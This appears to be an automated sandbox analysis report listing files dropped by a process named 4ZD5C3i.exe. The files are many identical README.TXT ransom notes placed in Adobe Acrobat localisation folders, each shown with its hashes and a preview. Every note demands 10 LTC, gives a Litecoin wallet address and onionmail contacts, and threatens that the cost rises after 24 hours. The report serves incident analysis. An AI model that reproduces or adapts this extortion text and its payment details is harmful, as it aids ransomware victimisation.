                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
